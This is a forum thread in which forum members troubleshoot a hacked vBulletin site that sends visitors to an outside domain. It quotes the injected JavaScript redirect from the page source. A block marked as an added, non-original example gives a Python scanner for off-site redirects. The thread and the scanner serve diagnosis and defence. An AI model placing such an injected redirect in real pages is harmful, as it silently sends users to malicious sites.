
Hacked

RacerDeac

I think the site has been hacked with a redirect. I get redirected to another site when accessing via my laptop or mobile browser. Only able to access via mobile app.
 
http://www.phlebotomyguide.net/

That's the URL to search for in the site code.
 
Looks as though the hacker is still logged on... as "admin"

adminhacker.jpg
 
Looks as though the hacker is still logged on... as "admin"

The hack is at the server/code level rather than from within the forum software. Probably an FTP hack unless there's some sort of strange VBulletin vulnerability that allows you to insert code onto the server.
 
The hack is at the server/code level rather than from within the forum software. Probably an FTP hack unless there's some sort of strange VBulletin vulnerability that allows you to insert code onto the server.

Yea, that's where they stuck the JS hack. But if the admin password was weak or default, they likely got logged in to Vbulletin as well. I've never seen "admin" listed as a logged in user.
 
I think it's a VBulletin vulnerability.. Look where the script appears in a page source:

<title>Old Gold and Black Forums - Powered by vBulletin</title>
</head>
<body>
<!-- logo -->
<script type="text/javascript">
window.location = "http://phlebotomyguide.net/ww.php"
</script>

<a name="top"></a>
<!-- <table border="0" width="100%" cellpadding="0" cellspacing="0" align="center">
<tr>
<td align="center"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" /></a></td>


</tr>
</table> -->
<div style="text-align: center;"><a href="index.php"><img src="images/misc/Logo.png" border="0" alt="Old Gold and Black Forums" style="margin: 0 auto; padding: 0" /></a></div>
<!-- /logo -->
 
Yea, that's where they stuck the JS hack. But if the admin password was weak or default, they likely got logged in to Vbulletin as well. I've never seen "admin" listed as a logged in user.

I just assumed that "admin" had logged in because there was a problem with the site.
 
I think it's a VBulletin vulnerability.. Look where the script appears in a page source:

Yeah, but that would be easy enough to insert via FTP. I'm not sure if VBulletin really has much ability to insert code via its backend interface, but I haven't used it in a while.
 
I just assumed that "admin" had logged in because there was a problem with the site.

Not sure if it was me logging in as admin, or the hacker. Either way, all the passwords have been changed. Any idea where this code might be? I see it in our page source. We are drawing blanks.
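
One way to run the search asked about above, as an added example that is not part of the original thread: it scans page source, files on disk or exported template text for inline-script redirects to hosts other than your own. The host name `forum.example`, the function names and the sample text (constructed from the snippet quoted in the thread) are assumptions.

```python
import os
import re
from urllib.parse import urlparse

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script\s*>", re.I | re.S)
# location = "...", window.location.href = '...', location.replace("...")
NAV_RE = re.compile(
    r"""\blocation(?:\.href)?\s*(?:=|\.(?:replace|assign)\s*\()\s*["']([^"']+)["']""",
    re.I)

def find_offsite_redirects(text, own_hosts):
    """Return [(line_number, url)] for inline-script redirects to foreign hosts."""
    hits = []
    for m in SCRIPT_RE.finditer(text):
        for r in NAV_RE.finditer(m.group(1)):
            url = r.group(1)
            host = (urlparse(url).hostname or "").lower()
            if host and host not in own_hosts:  # relative URLs have no host
                line = text.count("\n", 0, m.start(1) + r.start()) + 1
                hits.append((line, url))
    return hits

def scan_tree(root, own_hosts, exts=(".php", ".html", ".htm", ".tpl")):
    """Walk root and yield (path, line, url) for every hit in matching files."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    for line, url in find_offsite_redirects(fh.read(), own_hosts):
                        yield path, line, url

# Constructed sample: the injected script from the thread plus two
# legitimate same-site redirects that must not be reported.
SAMPLE = """<body>
<!-- logo -->
<script type="text/javascript">
window.location = "http://phlebotomyguide.net/ww.php"
</script>
<script type="text/javascript">
if (!loggedIn) { window.location.href = "/login.php"; }
location.replace("http://forum.example/index.php");
</script>
"""

if __name__ == "__main__":
    for hit in find_offsite_redirects(SAMPLE, {"forum.example"}):
        print(hit)
```

This only catches redirects written as plain string literals like the one in the thread; an encoded or obfuscated injection needs a diff against known-good files or templates.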
 
Yeah, but that would be easy enough to insert via FTP. I'm not sure if VBulletin really has much ability to insert code via its backend interface, but I haven't used it in a while.

I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.
 
I would honestly hope they don't use FTP to work on this site. Too insecure. Better to use SSL or SFTP... Oh well though.

Yeah, I use FTP as a verb to cover moving files up and down. I'll specify next time. :thumbsup:
 